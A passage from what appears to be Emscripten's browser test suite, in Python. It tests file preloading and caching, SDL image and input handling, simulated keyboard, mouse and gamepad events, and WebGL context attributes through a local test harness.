On non-Windowses they can, so test that. d = 'dir with ' + tricky_part abs_d = os.path.abspath(d) ensure_dir(abs_d) txt = 'file with ' + tricky_part + '.txt' create_file(os.path.join(d, txt), 'load me right before') cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp') create_file(cpp, r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> int main() { FILE *f = fopen("%s", "r"); char buf[100]; fread(buf, 1, 20, f); buf[20] = 0; fclose(f); printf("|%%s|\n", buf); assert(strcmp("load me right before", buf) == 0); return 0; } ''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))) data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data') data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js') abs_txt = os.path.join(abs_d, txt) self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file]) page_file = os.path.join(d, 'file with ' + tricky_part + '.html') abs_page_file = os.path.abspath(page_file) self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY) self.run_browser(page_file, '|load me right before|.', '/report_result?exit:0') @parameterized({ '0': (0,), '1mb': (1 * 1024 * 1024,), '100mb': (100 * 1024 * 1024,), '150mb': (150 * 1024 * 1024,), }) def test_preload_caching(self, extra_size): self.set_setting('EXIT_RUNTIME') create_file('main.c', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> extern int checkPreloadResults(); int main(int argc, char** argv) { FILE *f = fopen("%s", "r"); char buf[100]; fread(buf, 1, 20, f); buf[20] = 0; fclose(f); printf("|%%s|\n", buf); assert(strcmp("load me right before", buf) == 0); return checkPreloadResults(); } ''' % 'somefile.txt') create_file('test.js', ''' mergeInto(LibraryManager.library, { checkPreloadResults: function() { var cached = 0; var packages = 
Object.keys(Module['preloadResults']); packages.forEach(function(package) { var fromCache = Module['preloadResults'][package]['fromCache']; if (fromCache) ++ cached; }); return cached; } }); ''') # test caching of various sizes, including sizes higher than 128MB which is # chrome's limit on IndexedDB item sizes, see # https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177 # https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60 if is_chrome() and extra_size >= 100 * 1024 * 1024: self.skipTest('chrome bug') create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size)) print('size:', os.path.getsize('somefile.txt')) self.compile_btest(['main.c', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-sALLOW_MEMORY_GROWTH'], reporting=Reporting.JS_ONLY) self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0') self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1') def test_preload_caching_indexeddb_name(self): self.set_setting('EXIT_RUNTIME') create_file('somefile.txt', '''load me right before running the code please''') def make_main(path): print(path) create_file('main.c', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> extern int checkPreloadResults(); int main(int argc, char** argv) { FILE *f = fopen("%s", "r"); char buf[100]; fread(buf, 1, 20, f); buf[20] = 0; fclose(f); printf("|%%s|\n", buf); int result = 0; assert(strcmp("load me right before", buf) == 0); return checkPreloadResults(); } ''' % path) create_file('test.js', ''' mergeInto(LibraryManager.library, { checkPreloadResults: function() { var cached = 0; var packages = 
Object.keys(Module['preloadResults']); packages.forEach(function(package) { var fromCache = Module['preloadResults'][package]['fromCache']; if (fromCache) ++ cached; }); return cached; } }); ''') make_main('somefile.txt') self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js']) self.compile_btest(['main.c', '--js-library', 'test.js', '--pre-js', 'somefile.js', '-o', 'page.html', '-sFORCE_FILESYSTEM'], reporting=Reporting.JS_ONLY) self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:0') self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?exit:1') def test_multifile(self): # a few files inside a directory ensure_dir('subdirr/moar') create_file('subdirr/data1.txt', '1214141516171819') create_file('subdirr/moar/data2.txt', '3.14159265358979') create_file('main.c', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> int main() { char buf[17]; FILE *f = fopen("subdirr/data1.txt", "r"); fread(buf, 1, 16, f); buf[16] = 0; fclose(f); printf("|%s|\n", buf); assert(strcmp("1214141516171819", buf) == 0); FILE *f2 = fopen("subdirr/moar/data2.txt", "r"); fread(buf, 1, 16, f2); buf[16] = 0; fclose(f2); printf("|%s|\n", buf); assert(strcmp("3.14159265358979", buf) == 0); return 0; } ''') # by individual files self.btest_exit('main.c', args=['--preload-file', 'subdirr/data1.txt', '--preload-file', 'subdirr/moar/data2.txt']) # by directory, and remove files to make sure self.set_setting('EXIT_RUNTIME') self.compile_btest(['main.c', '--preload-file', 'subdirr', '-o', 'page.html'], reporting=Reporting.JS_ONLY) shutil.rmtree('subdirr') self.run_browser('page.html', 'You should see two cool numbers', '/report_result?exit:0') def test_custom_file_package_url(self): # a few files inside a directory ensure_dir('subdirr') ensure_dir('cdn') create_file(Path('subdirr/data1.txt'), 
'1214141516171819') # change the file package base dir to look in a "cdn". note that normally # you would add this in your own custom html file etc., and not by # modifying the existing shell in this manner default_shell = read_file(path_from_root('src/shell.html')) create_file('shell.html', default_shell.replace('var Module = {', ''' var Module = { locateFile: function(path, prefix) { if (path.endsWith(".wasm")) { return prefix + path; } else { return "cdn/" + path; } }, ''')) create_file('main.c', r''' #include <assert.h> #include <stdio.h> #include <string.h> #include <emscripten.h> int main() { char buf[17]; FILE *f = fopen("subdirr/data1.txt", "r"); fread(buf, 1, 16, f); buf[16] = 0; fclose(f); printf("|%s|\n", buf); assert(strcmp("1214141516171819", buf) == 0); return 0; } ''') self.set_setting('EXIT_RUNTIME') self.compile_btest(['main.c', '--shell-file', 'shell.html', '--preload-file', 'subdirr/data1.txt', '-o', 'test.html'], reporting=Reporting.JS_ONLY) shutil.move('test.data', Path('cdn/test.data')) self.run_browser('test.html', '', '/report_result?exit:0') def test_missing_data_throws_error(self): def setup(assetLocalization): self.clear() create_file('data.txt', 'data') create_file('main.cpp', r''' #include <stdio.h> #include <string.h> #include <emscripten.h> int main() { // This code should never be executed in terms of missing required dependency file. return 0; } ''') create_file('on_window_error_shell.html', r''' <html> <center><canvas id='canvas' width='256' height='256'></canvas></center> <hr><div id='output'></div><hr> <script type='text/javascript'> window.onerror = function(error) { window.disableErrorReporting = true; window.onerror = null; var result = error.indexOf("test.data") >= 0 ? 1 : 0; var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://localhost:8888/report_result?' 
+ result, true); xhr.send(); setTimeout(function() { window.close() }, 1000); } var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "''' + assetLocalization + r'''" + path;}}, print: (function() { var element = document.getElementById('output'); return function(text) { element.innerHTML += text.replace('\n', '<br>', 'g') + '<br>';}; })(), canvas: document.getElementById('canvas') }; </script> {{{ SCRIPT }}} </body> </html>''') def test(): # test test missing file should run xhr.onload with status different than 200, 304 or 206 setup("") self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']) shutil.move('test.data', 'missing.data') self.run_browser('test.html', '', '/report_result?1') # test unknown protocol should go through xhr.onerror setup("unknown_protocol://") self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']) self.run_browser('test.html', '', '/report_result?1') # test wrong protocol and port setup("https://localhost:8800/") self.compile_btest(['main.cpp', '--shell-file', 'on_window_error_shell.html', '--preload-file', 'data.txt', '-o', 'test.html']) self.run_browser('test.html', '', '/report_result?1') test() # TODO: CORS, test using a full url for locateFile # create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function (path) {return "http:/localhost:8888/cdn/" + path;}, ')) # test() @also_with_wasmfs def test_dev_random(self): self.btest_exit(Path('filesystem/dev_random.cpp')) def test_sdl_swsurface(self): self.btest_exit('sdl_swsurface.c', args=['-lSDL', '-lGL']) def test_sdl_surface_lock_opts(self): # Test Emscripten-specific extensions to optimize SDL_LockSurface and SDL_UnlockSurface. 
    self.btest('hello_world_sdl.cpp', reference='htmltest.png', message='You should see "hello, world!" and a colored cube.', args=['-DTEST_SDL_LOCK_OPTS', '-lSDL', '-lGL'])

  def test_sdl_image(self):
    # load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
    src = test_file('sdl_image.c')
    # Exercise both --memory-init-file modes (0 and 1) crossed with two
    # preload mappings: file at the FS root, and file remapped into /assets
    # via the src@dst syntax.
    for mem in [0, 1]:
      for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
                                      ('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
        self.btest_exit(src, args=[
          '-O2', '-lSDL', '-lGL',
          '--memory-init-file', str(mem), '--preload-file', dest,
          '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '--use-preload-plugins'
        ])

  @also_with_wasmfs
  def test_sdl_image_jpeg(self):
    # Same as test_sdl_image, but with a .jpeg (rather than .jpg) suffix so
    # that extension-based type detection in the preload plugins is covered.
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
    src = test_file('sdl_image.c')
    self.btest_exit(src, args=[
      '-lSDL', '-lGL',
      '--preload-file', 'screenshot.jpeg',
      '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '--use-preload-plugins'
    ])

  def test_sdl_image_prepare(self):
    # load an image file, get pixel data.
    # The file is named 'screenshot.not' so the browser cannot guess the type
    # from the extension; emscripten_run_preload_plugins must be used.
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
    self.btest('sdl_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'], also_proxied=True, manually_trigger_reftest=True)

  @parameterized({
    '': ([],),
    # add testing for closure on preloaded files + ENVIRONMENT=web (we must not
    # emit any node.js code here, see
    # https://github.com/emscripten-core/emscripten/issues/14486
    'closure_webonly': (['--closure', '1', '-sENVIRONMENT=web'],)
  })
  def test_sdl_image_prepare_data(self, args):
    # load an image file, get pixel data.
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
    self.btest('sdl_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-lSDL', '-lGL'] + args, manually_trigger_reftest=True)

  def test_sdl_image_must_prepare(self):
    # load an image file, get pixel data.
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
    self.btest('sdl_image_must_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.jpg', '-lSDL', '-lGL'], manually_trigger_reftest=True)

  def test_sdl_stb_image(self):
    # load an image file, get pixel data.
    # Uses the stb_image decoder (-sSTB_IMAGE) instead of the browser's
    # builtin decoding; the '.not' extension forces that path.
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
    self.btest('sdl_stb_image.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])

  def test_sdl_stb_image_bpp(self):
    # Runs the same stb_image test against PNGs of all four channel counts
    # (1=gray, 2=gray+alpha, 3=RGB, 4=RGBA); self.clear() resets the working
    # directory between the sub-cases.

    # load grayscale image without alpha
    self.clear()
    shutil.copyfile(test_file('sdl-stb-bpp1.png'), 'screenshot.not')
    self.btest('sdl_stb_image.c', reference='sdl-stb-bpp1.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])

    # load grayscale image with alpha
    self.clear()
    shutil.copyfile(test_file('sdl-stb-bpp2.png'), 'screenshot.not')
    self.btest('sdl_stb_image.c', reference='sdl-stb-bpp2.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])

    # load RGB image
    self.clear()
    shutil.copyfile(test_file('sdl-stb-bpp3.png'), 'screenshot.not')
    self.btest('sdl_stb_image.c', reference='sdl-stb-bpp3.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])

    # load RGBA image
    self.clear()
    shutil.copyfile(test_file('sdl-stb-bpp4.png'), 'screenshot.not')
    self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])

  def test_sdl_stb_image_data(self):
    # load an image file, get pixel data.
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
    self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])

  def test_sdl_stb_image_cleanup(self):
    # --memoryprofiler is enabled so leaks from the stb_image cleanup path
    # would be visible in the instrumented build.
    shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
    self.btest_exit('sdl_stb_image_cleanup.c', args=['-sSTB_IMAGE', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])

  def test_sdl_canvas(self):
    self.clear()
    self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-lSDL', '-lGL'])
    # some extra coverage
    self.clear()
    self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O0', '-sSAFE_HEAP', '-lSDL', '-lGL'])
    self.clear()
    self.btest_exit('sdl_canvas.c', args=['-sLEGACY_GL_EMULATION', '-O2', '-sSAFE_HEAP', '-lSDL', '-lGL'])

  def post_manual_reftest(self, reference=None):
    # post_build hook for manual-reference tests: registers the reftest
    # expectation, then injects a script into test.html that overrides
    # window.close() to run the reftest (after a delay for rAFs to settle)
    # before actually closing the window.
    self.reftest(test_file(self.reference if reference is None else reference))

    html = read_file('test.html')
    html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s

var windowClose = window.close;
window.close = function() {
  // wait for rafs to arrive and the screen to update before reftesting
  setTimeout(function() {
    doReftest();
    setTimeout(windowClose, 5000);
  }, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
    create_file('test.html', html)

  def test_sdl_canvas_proxy(self):
    create_file('data.txt', 'datum')
    self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)

  @requires_graphics_hardware
  def test_glgears_proxy_jstarget(self):
    # test .js target with --proxy-worker; emits 2 js files, client and worker
    self.compile_btest([test_file('hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-sGL_TESTING', '-lGL', '-lglut'])
    shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png') self.run_browser('test.html', None, '/report_result?0') def test_sdl_canvas_alpha(self): # N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer. # See https://github.com/emscripten-core/emscripten/issues/4069. create_file('flag_0.js', ''' Module['arguments'] = ['-0']; ''') self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12) self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12) def test_sdl_key(self): for delay in [0, 1]: for defines in [ [], ['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER'] ]: for async_ in [ [], ['-DTEST_SLEEP', '-sASSERTIONS', '-sSAFE_HEAP', '-sASYNCIFY'] ]: print(delay, defines, async_) create_file('pre.js', ''' function keydown(c) { %s var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); %s } function keyup(c) { %s var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); %s } ''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else '')) self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main', '-lSDL', '-lGL']) self.run_browser('page.html', '', '/report_result?223092870') def test_sdl_key_proxy(self): create_file('pre.js', ''' var Module = {}; Module.postRun = function() { function doOne() { Module._one(); setTimeout(doOne, 1000/60); } setTimeout(doOne, 1000/60); } ''') def post(): html = read_file('test.html') html = html.replace('</body>', ''' <script> function keydown(c) { var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 
'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); } function keyup(c) { var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); } keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down keydown(37);keyup(37); // left keydown(39);keyup(39); // right keydown(65);keyup(65); // a keydown(66);keyup(66); // b keydown(100);keyup(100); // trigger the end </script> </body>''') create_file('test.html', html) self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL'], manual_reference=True, post_build=post) def test_canvas_focus(self): self.btest_exit('canvas_focus.c') def test_keydown_preventdefault_proxy(self): def post(): html = read_file('test.html') html = html.replace('</body>', ''' <script> function keydown(c) { var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); return document.dispatchEvent(event); } function keypress(c) { var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); return document.dispatchEvent(event); } function keyup(c) { var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); return document.dispatchEvent(event); } function sendKey(c) { // Simulate the sending of the keypress event when the // prior keydown event is not prevent defaulted. if (keydown(c) === false) { console.log('keydown prevent defaulted, NOT sending keypress!!!'); } else { keypress(c); } keyup(c); } // Send 'a'. Simulate the sending of the keypress event when the // prior keydown event is not prevent defaulted. sendKey(65); // Send backspace. 
Keypress should not be sent over as default handling of // the Keydown event should be prevented. sendKey(8); keydown(100);keyup(100); // trigger the end </script> </body>''') create_file('test.html', html) self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-sEXPORTED_FUNCTIONS=_main'], manual_reference=True, post_build=post) def test_sdl_text(self): create_file('pre.js', ''' Module.postRun = function() { function doOne() { Module._one(); setTimeout(doOne, 1000/60); } setTimeout(doOne, 1000/60); } function simulateKeyEvent(c) { var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.body.dispatchEvent(event); } ''') self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-lSDL', '-lGL']) self.run_browser('page.html', '', '/report_result?1') def test_sdl_mouse(self): create_file('pre.js', ''' function simulateMouseEvent(x, y, button) { var event = document.createEvent("MouseEvents"); if (button >= 0) { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousedown', true, true, window, 1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event1); var event2 = document.createEvent("MouseEvents"); event2.initMouseEvent('mouseup', true, true, window, 1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event2); } else { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousemove', true, true, window, 0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, 0, 0, 0, 0, 0, null); 
Module['canvas'].dispatchEvent(event1); } } window['simulateMouseEvent'] = simulateMouseEvent; ''') self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']) self.run_browser('page.html', '', '/report_result?1') def test_sdl_mouse_offsets(self): create_file('pre.js', ''' function simulateMouseEvent(x, y, button) { var event = document.createEvent("MouseEvents"); if (button >= 0) { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousedown', true, true, window, 1, x, y, x, y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event1); var event2 = document.createEvent("MouseEvents"); event2.initMouseEvent('mouseup', true, true, window, 1, x, y, x, y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event2); } else { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousemove', true, true, window, 0, x, y, x, y, 0, 0, 0, 0, 0, null); Module['canvas'].dispatchEvent(event1); } } window['simulateMouseEvent'] = simulateMouseEvent; ''') create_file('page.html', ''' <html> <head> <style type="text/css"> html, body { margin: 0; padding: 0; } #container { position: absolute; left: 5px; right: 0; top: 5px; bottom: 0; } #canvas { position: absolute; left: 0; width: 600px; top: 0; height: 450px; } textarea { margin-top: 500px; margin-left: 5px; width: 600px; } </style> </head> <body> <div id="container"> <canvas id="canvas"></canvas> </div> <textarea id="output" rows="8"></textarea> <script type="text/javascript"> var Module = { canvas: document.getElementById('canvas'), print: (function() { var element = document.getElementById('output'); element.value = ''; // clear browser cache return function(text) { if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' '); element.value += text + "\\n"; element.scrollTop = element.scrollHeight; // focus on bottom }; })() }; </script> <script type="text/javascript" 
src="sdl_mouse.js"></script> </body> </html> ''') self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL']) self.run_browser('page.html', '', '/report_result?1') def test_glut_touchevents(self): self.btest_exit('glut_touchevents.c', args=['-lglut']) def test_glut_wheelevents(self): self.btest_exit('glut_wheelevents.c', args=['-lglut']) @requires_graphics_hardware def test_glut_glutget_no_antialias(self): self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL']) self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED']) # This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer. @requires_graphics_hardware def test_glut_glutget(self): self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL']) self.btest_exit('glut_glutget.c', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED']) def test_sdl_joystick_1(self): # Generates events corresponding to the Working Draft of the HTML5 Gamepad API. # http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface create_file('pre.js', ''' var gamepads = []; // Spoof this function. 
navigator['getGamepads'] = function() { return gamepads; }; window['addNewGamepad'] = function(id, numAxes, numButtons) { var index = gamepads.length; gamepads.push({ axes: new Array(numAxes), buttons: new Array(numButtons), id: id, index: index }); var i; for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0; for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0; }; window['simulateGamepadButtonDown'] = function (index, button) { gamepads[index].buttons[button] = 1; }; window['simulateGamepadButtonUp'] = function (index, button) { gamepads[index].buttons[button] = 0; }; window['simulateAxisMotion'] = function (index, axis, value) { gamepads[index].axes[axis] = value; }; ''') self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']) def test_sdl_joystick_2(self): # Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API. # https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad create_file('pre.js', ''' var gamepads = []; // Spoof this function. navigator['getGamepads'] = function() { return gamepads; }; window['addNewGamepad'] = function(id, numAxes, numButtons) { var index = gamepads.length; gamepads.push({ axes: new Array(numAxes), buttons: new Array(numButtons), id: id, index: index }); var i; for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0; // Buttons are objects for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 }; }; // FF mutates the original objects. 
window['simulateGamepadButtonDown'] = function (index, button) { gamepads[index].buttons[button].pressed = true; gamepads[index].buttons[button].value = 1; }; window['simulateGamepadButtonUp'] = function (index, button) { gamepads[index].buttons[button].pressed = false; gamepads[index].buttons[button].value = 0; }; window['simulateAxisMotion'] = function (index, axis, value) { gamepads[index].axes[axis] = value; }; ''') self.btest_exit('sdl_joystick.c', args=['-O2', '--minify=0', '--pre-js', 'pre.js', '-lSDL', '-lGL']) @requires_graphics_hardware def test_glfw_joystick(self): # Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API. # https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad create_file('pre.js', ''' var gamepads = []; // Spoof this function. navigator['getGamepads'] = function() { return gamepads; }; window['addNewGamepad'] = function(id, numAxes, numButtons) { var index = gamepads.length; var gamepad = { axes: new Array(numAxes), buttons: new Array(numButtons), id: id, index: index }; gamepads.push(gamepad) var i; for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0; // Buttons are objects for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 }; // Dispatch event (required for glfw joystick; note not used in SDL test) var event = new Event('gamepadconnected'); event.gamepad = gamepad; window.dispatchEvent(event); }; // FF mutates the original objects. 
window['simulateGamepadButtonDown'] = function (index, button) { gamepads[index].buttons[button].pressed = true; gamepads[index].buttons[button].value = 1; }; window['simulateGamepadButtonUp'] = function (index, button) { gamepads[index].buttons[button].pressed = false; gamepads[index].buttons[button].value = 0; }; window['simulateAxisMotion'] = function (index, axis, value) { gamepads[index].axes[axis] = value; }; ''') self.btest_exit(test_file('test_glfw_joystick.c'), args=['-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-sUSE_GLFW=3']) @requires_graphics_hardware def test_webgl_context_attributes(self): # Javascript code to check the attributes support we want to test in the WebGL implementation # (request the attribute, create a context and check its value afterwards in the context attributes). # Tests will succeed when an attribute is not supported. create_file('check_webgl_attributes_support.js', ''' mergeInto(LibraryManager.library, { webglAntialiasSupported: function() { canvas = document.createElement('canvas'); context = canvas.getContext('experimental-webgl', {antialias: true}); attributes = context.getContextAttributes(); return attributes.antialias; }, webglDepthSupported: function() { canvas = document.createElement('canvas'); context = canvas.getContext('experimental-webgl', {depth: true}); attributes = context.getContextAttributes(); return attributes.depth; }, webglStencilSupported: function() { canvas = document.createElement('canvas'); context = canvas.getContext('experimental-webgl', {stencil: true}); attributes = context.getContextAttributes(); return attributes.stencil; }, webglAlphaSupported: function() { canvas = document.createElement('canvas'); context = canvas.getContext('experimental-webgl', {alpha: true}); attributes = context.getContextAttributes(); return attributes.alpha; } }); ''') # Copy common code file to temporary directory filepath = test_file('test_webgl_context_attributes_common.c') 
temp_filepath = os.path.basename(filepath) shutil.copyfile(filepath, temp_filepath) # perform tests with attributes activated self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW']) self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW']) self.btest_exit('test_webgl_context_attributes_sdl2.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-sUSE_SDL=2', '-lGLEW']) self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW']) # perform tests with attributes desactivated self.btest_exit('test_webgl_context_attributes_glut.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW']) self.btest_exit('test_webgl_context_attributes_sdl.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW']) self.btest_exit('test_webgl_context_attributes_glfw.c', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW']) @requires_graphics_hardware def test_webgl_no_double_error(self): self.btest_exit('webgl_error.cpp') @requires_graphics_hardware def 